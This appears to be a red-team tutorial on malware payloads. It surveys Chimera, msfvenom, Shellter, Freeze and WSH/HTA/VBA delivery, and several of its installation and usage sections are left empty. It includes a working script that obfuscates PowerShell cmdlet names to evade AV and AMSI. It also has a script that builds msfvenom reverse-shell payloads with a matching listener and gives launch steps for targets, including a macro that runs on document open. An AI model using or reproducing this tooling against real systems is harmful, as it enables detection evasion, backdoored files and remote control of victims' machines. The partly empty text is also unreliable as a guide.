№3. RedTeam-Tools. Payload

15 May 2023 3 minutes Author: Lady Liberty

What is a payload?

A payload is the part of a piece of malware that performs the intended action on the victim system. Depending on the sample, the payload may corrupt files, drop additional Trojans, damage the file system, display messages or open other files. In red-team tooling the word is used more narrowly: the payload is the code (for example a reverse shell or a Meterpreter stager) that runs once the delivery mechanism has executed. A payload usually fires when the file carrying it is opened, and it is often gated on a trigger such as a particular date on the host.

Other categories of malware are defined by what their payload does. Spyware collects and transmits information without the user's knowledge, typically the websites visited, browser and system details and the machine's IP address. Adware is stand-alone software that displays advertisements while the computer is online; most adware also tracks browsing and shares that data with an interested party. A worm is self-replicating malware that locates vulnerable hosts and copies itself to them; it spreads most commonly through e-mail, e-mail signature scripts and shared network folders. A worm may or may not carry a harmful payload, and when it does, that payload often leaves the host more exposed to further viruses and Trojans.

Payload programs and tools

Chimera

Chimera is a PowerShell obfuscation script designed to bypass AMSI and anti-virus solutions. It takes malicious .ps1 files known to trigger AV and applies string substitution and variable concatenation so that the literal tokens common detection signatures look for never appear in the output file.
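The string-splitting idea behind Chimera, as an added illustration (this is not Chimera's own code and was not part of the original article): a POSIX shell script that rewrites the cmdlet names AV signatures commonly key on into concatenated fragments, invoked through PowerShell's call operator `&`, which accepts any expression that evaluates to a command name. The cmdlet list and the chunk size of 4 are arbitrary choices for the demonstration, and the one-line downloader stub is constructed input that fetches nothing.

```shell
#!/bin/sh
# Added illustration of Chimera-style string splitting (not Chimera's code).
# Rewrites signatured cmdlet names in PowerShell source into concatenated
# fragments so the literal token never appears in the file on disk.
set -eu

# Split a string into chunks of N characters (default 4, an arbitrary choice)
# and emit them as a parenthesised PowerShell concatenation:
#   Invoke-Expression  ->  ('Invo'+'ke-E'+'xpre'+'ssio'+'n')
ps_split_string() {
  s=$1
  n=${2:-4}
  out=""
  while [ -n "$s" ]; do
    chunk=$(printf '%s' "$s" | cut -c1-"$n")
    s=$(printf '%s' "$s" | cut -c"$((n + 1))"-)
    out="$out'$chunk'+"
  done
  printf '(%s)' "${out%+}"
}

# Replace every occurrence of the cmdlets below (an illustrative list) with the
# split form, invoked through PowerShell's call operator `&`:
#   Invoke-Expression $x  ->  & ('Invo'+'ke-E'+'xpre'+'ssio'+'n') $x
obfuscate_line() {
  line=$1
  for name in Invoke-Expression Invoke-WebRequest New-Object; do
    repl=$(ps_split_string "$name")
    while :; do
      case $line in
        *"$name"*)
          before=${line%%"$name"*}
          after=${line#*"$name"}
          line="$before& $repl$after"
          ;;
        *) break ;;
      esac
    done
  done
  printf '%s\n' "$line"
}

# Obfuscate a whole .ps1 read from stdin, line by line.
obfuscate_file() {
  while IFS= read -r l || [ -n "$l" ]; do
    obfuscate_line "$l"
  done
}

# Demo on a constructed one-line downloader stub (no real URL is fetched):
#   sh chimera_lite.sh demo
if [ "${1:-}" = demo ]; then
  printf '%s\n' 'Invoke-Expression (New-Object Net.WebClient).DownloadString($u)' | obfuscate_file
fi
```

The caveat a practitioner should keep in mind: concatenation only hides the literal token from static, file-based signatures. PowerShell reassembles the string before running it, and whatever is eventually passed to Invoke-Expression is handed to AMSI as a new script block in clear text. That is why Chimera stacks several transformations, and why the result has to be tested against the specific AV product rather than assumed to work.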

Installation:


Usage:



Msfvenom



Msfvenom generates payloads for different operating systems in a wide range of output formats (executables, shared objects, and script wrappers such as vbs, hta-psh and vba). It also offers encoders (for example x86/shikata_ga_nai) that rewrite the payload bytes; these were once used for AV evasion, but the encoder stubs are well known to modern AV and encoding alone should not be expected to bypass it.

Configure listener



Msfvenom commands

Windows:



Linux:





Shellter

Shellter is a dynamic shellcode injection tool and the first truly dynamic PE infector.
It can be used to inject shellcode into native Windows applications (currently only 32-bit applications).
Shellter takes advantage of the original PE file structure and does not apply modifications such as changing the memory access permissions of sections (unless the user asks for it), adding an extra section with RWE access, or anything else that would look suspicious to an AV scan.

Installation (Kali):



Usage:

Select a legitimate binary to backdoor and run Shellter against it; the tool walks you through the injection interactively.



Freeze

Freeze is a payload creation tool used to bypass EDR security measures to execute shellcode in a stealthy manner.

Installation:



Usage:





WSH

Creating a payload:



Run:



HTA

Creating a payload:



Run: launch the .hta file; mshta.exe is the registered handler, so opening it is enough.

VBA

Creating a payload:



Run: place the macro code in the document so that it is called from Auto_Open(); it executes when the document is opened with macros enabled.
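The msfvenom section and the WSH, HTA and VBA sections above each have two halves, a payload and the way it is launched, and the mistake that costs the most time in practice is a listener whose payload name, LHOST or LPORT does not match the artefact. The script below is an added example (not from the original article, and not Metasploit's own tooling): it derives the msfvenom command and the multi/handler resource file from the same variables, and records how each format is launched on the target. The default payload per format, the output file names and the `DRY_RUN`/`PAYLOAD`/`ENCODER`/`ITER` environment variables are assumptions of this demo, not msfvenom options; the msfvenom flags and msfconsole commands themselves (`-p`, `-f`, `-o`, `-e`, `-i`, `use exploit/multi/handler`, `exploit -j -z`, `msfconsole -r`) are standard.

```shell
#!/bin/sh
# Added example (not from the original article): build one msfvenom command and
# the matching multi/handler resource file from the same variables, so the
# payload name, LHOST and LPORT cannot drift apart between payload and listener.
set -eu

# Default payload per output format (assumptions for the demo; override with
# PAYLOAD=<name>). The script formats default to an x86 payload because 32-bit
# code runs on both 32- and 64-bit Windows.
default_payload() {
  case $1 in
    elf) echo linux/x64/shell_reverse_tcp ;;
    exe) echo windows/x64/meterpreter/reverse_tcp ;;
    *)   echo windows/meterpreter/reverse_tcp ;;
  esac
}

# File extension of the artefact; only hta-psh differs from the format name.
out_ext() {
  case $1 in
    hta-psh) echo hta ;;
    *)       echo "$1" ;;
  esac
}

# How the artefact is launched on the target, following the WSH/HTA/VBA
# sections above. The hint is for the operator; nothing is executed here.
launch_hint() {
  case $1 in
    exe)     echo 'run payload.exe on the target' ;;
    elf)     echo 'chmod +x payload.elf && ./payload.elf' ;;
    vbs)     echo 'cscript //nologo payload.vbs   (Windows Script Host)' ;;
    hta-psh) echo 'mshta payload.hta' ;;
    vba)     echo 'paste into a document macro; Auto_Open() fires when the document is opened' ;;
    *)       echo "unsupported format: $1" >&2; return 1 ;;
  esac
}

# gen_payload <lhost> <lport> <format> <outdir>
# Writes <outdir>/handler.rc and prints the msfvenom command. The command is
# only executed when DRY_RUN=0 and msfvenom is on PATH.
gen_payload() {
  lhost=$1; lport=$2; fmt=$3; outdir=$4
  payload=${PAYLOAD:-$(default_payload "$fmt")}
  outfile="$outdir/payload.$(out_ext "$fmt")"
  mkdir -p "$outdir"

  # The listener is generated from exactly the variables used for the payload.
  cat > "$outdir/handler.rc" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF

  cmd="msfvenom -p $payload LHOST=$lhost LPORT=$lport -f $fmt -o $outfile"
  # Optional encoder pass (ENCODER=x86/shikata_ga_nai ITER=5). Encoders change
  # the bytes of x86 shellcode but their stubs are well known to AV; do not
  # expect evasion from this alone.
  if [ -n "${ENCODER:-}" ]; then
    cmd="$cmd -e $ENCODER -i ${ITER:-3}"
  fi
  printf '%s\n' "$cmd"
  if [ "${DRY_RUN:-1}" = 0 ] && command -v msfvenom >/dev/null 2>&1; then
    $cmd
  fi
}

# Usage: DRY_RUN=0 sh gen_payload.sh 10.0.0.5 4444 hta-psh ./out
if [ $# -ge 4 ]; then
  gen_payload "$@"
  echo "listener: msfconsole -q -r $4/handler.rc"
  echo "target:   $(launch_hint "$3")"
fi
```

Start the listener with `msfconsole -q -r <outdir>/handler.rc` before the artefact runs; `ExitOnSession false` with `exploit -j -z` keeps the handler up so several callbacks from the same payload can be caught without restarting it.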
